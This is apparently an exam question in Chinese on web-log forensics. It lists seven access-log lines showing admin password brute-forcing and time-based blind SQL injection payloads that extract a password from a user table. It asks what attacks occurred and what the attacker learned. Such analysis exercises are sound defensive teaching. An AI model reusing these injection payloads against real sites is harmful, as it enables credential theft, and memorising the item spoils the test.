某Web站点被攻击者入侵,事后安全工程师获取到了该网站Web服务器的访问日...
某Web站点被攻击者入侵,事后安全工程师获取到了该网站Web服务器的访问日志进行分析,题目中依照日志时间顺序列出7条可疑日志,请分析后作答:
172.17.0.1 [27/May/2019:07:32:52 +0000] "GET /admin.php?username=admin&password=1234567890 HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"
172.17.0.1 [27/May/2019:07:32:53 +0000] "GET /admin.php?username=admin&password=michael HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"
172.17.0.1 [27/May/2019:07:32:58 +0000] "GET /admin.php?username=admin&password=654321 HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"
172.17.0.1 [27/May/2019:08:41:44 +0000] "GET /index.php?con=admin&act=index HTTP/1.1" 200 7718 "http://10.22.2.199/index.php?con=admin&act=payment_list" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"
172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='9',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"
172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='a',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"
172.17.0.1 [27/May/2019:08:42:00 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),2,1)='0',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"
(1)从日志判断,攻击者在对该Web站点尝试哪些类型的攻击?
(2)从日志前4条判断,攻击者获取到了网站管理员的哪项敏感信息?并阐述你的分析思路和依据。
(3)从日志后3条判断,攻击者验证通过的一个字符是?并阐述你的分析思路和依据。